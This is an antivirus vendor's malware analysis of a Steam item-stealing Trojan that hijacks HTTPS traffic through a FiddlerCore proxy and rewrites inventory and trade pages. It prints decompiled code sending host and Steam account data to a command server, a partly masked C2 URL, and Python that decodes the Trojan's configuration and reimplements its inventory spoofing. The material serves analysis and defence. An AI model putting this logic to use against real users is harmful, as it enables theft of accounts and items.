Trojan.PWS.Steam.15278

Added to the Dr.Web virus database: 2017-12-19

SHA1

  • 2891c6502586de470cad2108c4367ef23b375ff7
  • 3de7719afc981ee96b97300a4cd18b9365c771bf

A Trojan designed to steal collectibles (tradeable in-game items) from Steam users. It uses the FiddlerCore library to intercept server responses and replace data in them. Fiddler is installed as a local proxy on the infected computer and listens on the port indicated in the Trojan's configuration (port 8333 in the examined samples). Fiddler also installs a root certificate into the system trust store, which is what allows it to intercept encrypted HTTPS traffic without certificate warnings.

Using the Windows registry, it determines the path to the Steam installation directory, the operating system's language settings, and the username stored in the AutoLoginUser value. In the Steam folder the Trojan checks whether the file \config\loginusers.vdf is present; if it is, it parses the file and extracts “account name <=> steamid64” pairs.

The Trojan sends the collected information to the command and control server (the data is sent every 30 minutes):

// Decompiled from the Trojan: host and Steam data reported to the C2 every 30 minutes.
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("type", "s");                                       // report type "s"; the configuration request below uses "r"
nameValueCollection.Add("keyAccess", "809af20434864b142664613a8e42ff78");   // hard-coded key, reused as "k" / "keyAccess" in the configuration request
nameValueCollection.Add("systemOS", value);
nameValueCollection.Add("systemUser", userName);                            // Windows user name
nameValueCollection.Add("systemMachine", machineName);                      // computer name
nameValueCollection.Add("languageOS", englishName);                         // OS language from the registry
nameValueCollection.Add("steamids", value2);                                // "account name <=> steamid64" pairs from loginusers.vdf
nameValueCollection.Add("steamPath", Class0.string_4);                      // Steam installation directory from the registry
nameValueCollection.Add("steamLang", Class0.string_6);
nameValueCollection.Add("steamRememberL", Class0.string_5);
nameValueCollection.Add("online", online.ToString());
Class0.POSTWithFakerHeader(Class0.soft2_req, nameValueCollection);          // POST with the extra "faker" header

It saves the following files to its own folder:

  • Windows Host.exe — the Trojan's body;
  • settings.conf — Fiddler's configuration;
  • FiddlerCore.dll — the Fiddler library, carrying a valid digital signature;
  • BCMakeCert.dll — the open-source BouncyCastle.Crypto library, used to generate certificates;
  • CertMaker.dll — the ICertificateProvider plugin for FiddlerCore.

It modifies the registry key [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] to ensure it starts automatically. The Trojan's resources contain one more executable, Proxy.Resources.Cleaner.exe, which is used to launch and then shut down Fiddler.

It installs its own handler for the OnBeforeResponse event of the Fiddler library, which allows server responses to be modified before they are passed on to the client. The handler ignores requests whose URL contains any of the following: “.bmp”, “.jpg”, “.jpeg”, “.js”, “.png”, “.ico”, “.svg”, “.pdf” or “localhost”. If a special flag is set in the Trojan's configuration and the user visits one of the following websites: opskins.com, igxe.cn, bitskins.com, g2a.com, csgo.tm, market.csgo.com, market.dota2.net, tf2.tm, a malicious script downloaded from the command and control server is injected into the page code. This script replaces the recipient of the collectibles when trades are made on those websites.

If the corresponding flag is set in the Trojan's configuration and the user of the infected computer visits steamcommunity.com, the Trojan sends the following POST request to the command and control server:

https://f****.pro/soft2/base.php?l=bG9ta2F0b3A%3D&k=809af20434864b142664613a8e42ff78&ek=cba2c8e810c06a917f95f6f424fbffa0

The request body is {"type": "r", "keyAccess": "809af20434864b142664613a8e42ff78"}, and the HTTP request carries an additional “faker” header with the value “gl” (hence the POSTWithFakerHeader name in the snippet above). In the received response, the byte sequence '\xD1\x96' (the UTF-8 encoding of the Cyrillic letter “і”) is replaced with 'i', '\xD1\x81' (Cyrillic “с”) with 'c', and '(' with '='; the result is then base64-decoded. The homoglyphs and the substituted padding character make the raw response fail a standard base64 decode, so the data cannot be recovered without this preprocessing. The decoded data is the Trojan's configuration, which contains the steamid64 of the user whose inventory is to be spoofed and the parameters of the collectibles to substitute.
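The decoding step described above, written out in Python as an added example (this is not the Trojan's code and not Dr.Web's). The client-side reversal (homoglyph substitution, then base64) is what the description gives; the server-side `obfuscate` helper that produces test input and the layout of the sample configuration (steamid64 keys mapping to a list of replacement items) are assumptions made for this illustration.

```python
"""Decoder for the obfuscated C2 configuration response.

Added example, not code from the Trojan or from Dr.Web. The reversal performed
by decode_config follows the description; obfuscate() and SAMPLE_CONFIG are
assumptions used only to build offline test data.
"""
import base64
import json

# The two UTF-8 byte sequences named in the description.
CYRILLIC_I = b"\xd1\x96"   # U+0456, renders like Latin 'i'
CYRILLIC_ES = b"\xd1\x81"  # U+0441, renders like Latin 'c'


def decode_config(raw: bytes) -> dict:
    """Undo the homoglyph/padding substitution, then base64-decode and parse JSON."""
    cleaned = (raw.replace(CYRILLIC_I, b"i")
                  .replace(CYRILLIC_ES, b"c")
                  .replace(b"(", b"="))
    # validate=True: any non-alphabet byte we failed to map raises binascii.Error
    # (a ValueError) instead of being silently discarded by the default decoder.
    return json.loads(base64.b64decode(cleaned, validate=True))


def obfuscate(config: dict) -> bytes:
    """Assumed server-side transform (the inverse of decode_config); test data only."""
    b64 = base64.b64encode(json.dumps(config, separators=(",", ":")).encode())
    return (b64.replace(b"i", CYRILLIC_I)
               .replace(b"c", CYRILLIC_ES)
               .replace(b"=", b"("))


# Constructed sample configuration (layout assumed): the key is the steamid64 whose
# inventory is spoofed; "name" is the market_hash_name to look for, the other fields
# are the values written into the matching rgDescriptions entry.
SAMPLE_CONFIG = {
    "76561198000000001": [
        {
            "name": "Sticker | Example",
            "market_hash_name": "Example Rare Item",
            "market_name": "Example Rare Item",
            "name_color": "8650AC",
            "icon_url": "constructed/icon",
            "icon_url_large": "constructed/icon_large",
            "description": "Constructed replacement description",
        }
    ]
}

if __name__ == "__main__":
    blob = obfuscate(SAMPLE_CONFIG)
    # The wire form contains no '=' and does contain the Cyrillic homoglyphs.
    assert b"=" not in blob and CYRILLIC_I in blob
    print(json.dumps(decode_config(blob), indent=2))
```

Because the Trojan does a plain string replace, every Cyrillic “і” and “с” in the response is mapped, not only those inside the base64 alphabet; an analyst reproducing the decode over a captured response should do the same rather than trying to be clever about positions.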

If the Content-Type of the intercepted response is HTML, the URL contains “steamcommunity.com” and “/tradeoffer”, and the connection uses plain HTTP, the Trojan replaces the server's response with a 302 redirect that moves the connection to HTTPS.

If the Content-Type of the response is JSON and the URL contains “steamcommunity.com/profiles/7656” and “/inventory/json/”, or contains “steamcommunity.com/tradeoffer”, “partnerinventory”, “partner=” and “appid=”, the Trojan extracts the steamid64 of the trade partner from the URL and checks whether the configuration obtained from the command and control server contains parameters for that steamid64. If it does not, the response is left untouched.

It then reads the “Cookie” HTTP header and checks the language set in the “Steam_Language” cookie: if it is Russian, the Trojan's substituted text is in Russian; in all other cases it is in English.

If the value jobject2["rgDescriptions"][jproperty.Name]["market_hash_name"] of a collectible matches a key in the server data for that steamid, the fields “market_hash_name”, “market_name”, “name”, “name_color”, “icon_url”, “icon_url_large” and “description”->“value” of that rgDescriptions entry are replaced with the data received from the command and control server. The “classid” field is not replaced, so the item actually transferred in the trade is unchanged; only the attributes shown to the user are.

If the Content-Type of the response is JSON and the URL contains “steamcommunity.com/inventory/”, the Trojan extracts the steamid64 from the URL and checks whether the configuration obtained from the command and control server contains parameters for that steamid64. As above, it reads the “Cookie” header and uses the “Steam_Language” cookie to choose Russian or English text. Then, for every collectible whose jobject2["rgDescriptions"][jproperty.Name]["market_hash_name"] matches the “name” field of an entry in the steamid data received from the command and control server, the same fields are replaced with the values received from the server.
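The rgDescriptions substitution described in the two preceding paragraphs, simulated in Python as an added example (not the Trojan's code and not Dr.Web's). The sample inventory, the configuration layout (steamid64 keys mapping to replacement rules whose “name” is the market_hash_name to match) and the classid-based check at the end are constructed for this illustration; the field names are the ones listed above. The sample stores the description text in a `descriptions` list, which is assumed here to be what the text calls “description”->“value”.

```python
"""Simulation of the inventory-JSON rewrite and a check for it.

Added example, not the Trojan's own code. The inventory sample and the
configuration layout are constructed; only the list of overwritten fields
and the untouched "classid" come from the description.
"""
import copy
import re

# Fields the Trojan overwrites; "classid" deliberately stays as it is.
REPLACED_FIELDS = ("market_hash_name", "market_name", "name", "name_color",
                   "icon_url", "icon_url_large")

# steamid64 as it appears in the two URL shapes the text names.
STEAMID_IN_URL = re.compile(r"steamcommunity\.com/(?:profiles/|inventory/)(7656\d{13})")


def steamid64_from_url(url: str):
    """Return the steamid64 embedded in an inventory URL, or None if absent."""
    m = STEAMID_IN_URL.search(url)
    return m.group(1) if m else None


def rewrite_descriptions(inventory: dict, steamid: str, config: dict):
    """Return (rewritten copy of inventory, number of entries substituted).

    Mirrors the described behaviour: only entries whose market_hash_name equals a
    rule's "name" for this steamid are touched, and classid is never changed.
    """
    rules = {rule["name"]: rule for rule in config.get(steamid, [])}
    out = copy.deepcopy(inventory)
    hits = 0
    for desc in out.get("rgDescriptions", {}).values():
        rule = rules.get(desc.get("market_hash_name"))
        if rule is None:
            continue
        for field in REPLACED_FIELDS:
            if field in rule:
                desc[field] = rule[field]
        if "description" in rule and desc.get("descriptions"):
            desc["descriptions"][0]["value"] = rule["description"]
        hits += 1
    return out, hits


def suspicious_entries(inventory: dict, trusted_names: dict) -> list:
    """Keys of rgDescriptions whose market_hash_name disagrees with a trusted
    classid -> market_hash_name map. The map must come from a path the proxy
    cannot touch (another machine, a fresh API fetch), since the Trojan leaves
    classid alone and rewrites only the display fields."""
    flagged = []
    for key, desc in inventory.get("rgDescriptions", {}).items():
        expected = trusted_names.get(desc.get("classid"))
        if expected is not None and expected != desc.get("market_hash_name"):
            flagged.append(key)
    return flagged


# Constructed sample inventory response (two items, one of them targeted).
SAMPLE_INVENTORY = {
    "success": True,
    "rgInventory": {
        "1001": {"id": "1001", "classid": "310776", "instanceid": "0", "amount": "1"},
        "1002": {"id": "1002", "classid": "310777", "instanceid": "0", "amount": "1"},
    },
    "rgDescriptions": {
        "310776_0": {
            "classid": "310776", "instanceid": "0",
            "market_hash_name": "Sticker | Example", "market_name": "Sticker | Example",
            "name": "Sticker | Example", "name_color": "D2D2D2",
            "icon_url": "constructed/sticker", "icon_url_large": "constructed/sticker_large",
            "descriptions": [{"type": "html", "value": "Constructed sticker"}],
        },
        "310777_0": {
            "classid": "310777", "instanceid": "0",
            "market_hash_name": "Case | Example", "market_name": "Case | Example",
            "name": "Case | Example", "name_color": "D2D2D2",
            "icon_url": "constructed/case", "icon_url_large": "constructed/case_large",
            "descriptions": [{"type": "html", "value": "Constructed case"}],
        },
    },
}

# Constructed configuration (layout assumed): replacement rules per steamid64.
SAMPLE_CONFIG = {
    "76561198000000001": [{
        "name": "Sticker | Example",
        "market_hash_name": "Example Rare Item", "market_name": "Example Rare Item",
        "name_color": "8650AC", "icon_url": "constructed/icon",
        "icon_url_large": "constructed/icon_large",
        "description": "Constructed replacement description",
    }]
}

if __name__ == "__main__":
    sid = steamid64_from_url("https://steamcommunity.com/profiles/76561198000000001/inventory/json/730/2")
    spoofed, n = rewrite_descriptions(SAMPLE_INVENTORY, sid, SAMPLE_CONFIG)
    print(n, "entries rewritten; classid still", spoofed["rgDescriptions"]["310776_0"]["classid"])
    print("flagged:", suspicious_entries(spoofed, {"310776": "Sticker | Example"}))
```

The check in suspicious_entries is only as good as its reference: anything fetched through the infected machine's proxy is already rewritten, which is why it takes the classid-to-name map as an input rather than fetching it.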

If the Content-Type of the response is HTML and the URL contains “steamcommunity.com/economy/itemclasshover/” and “content_only=1”, the Trojan parses the page, determines the steamid, and then attempts to replace the characteristics of the collectibles according to the data obtained from the command and control server.

Treatment recommendations

  1. If the operating system can be started (in normal mode or in safe mode), download Dr.Web Security Space and run a full scan of your computer and of all removable media you use. Learn more about Dr.Web Security Space.
  2. If the operating system cannot be started, change your computer's BIOS settings to boot from CD/DVD or USB. Download the Dr.Web® LiveDisk system rescue disk image or the utility for writing Dr.Web® LiveDisk to a USB stick, then prepare the USB stick accordingly. Boot the computer from it and run a full scan and treatment of the detected threats.

Run a full system scan with Dr.Web Antivirus for Mac OS.

Run a full scan of all disk partitions with Dr.Web Antivirus for Linux.

  1. If your mobile device is working normally, download and install Dr.Web for Android on it. Run a full scan and follow the recommendations for neutralizing the detected threats.
  2. If the mobile device is locked by a Trojan of the Android.Locker family (a message about a serious violation of the law or a ransom demand is displayed on the device's screen), proceed as follows:
    • start your smartphone or tablet in safe mode (if you do not know how, consult the device's documentation or contact the manufacturer);
    • then download and install Dr.Web for Android on the device, run a full scan and follow the recommendations for neutralizing the detected threats;
    • disconnect your device and reconnect it.

Learn more about Dr.Web for Android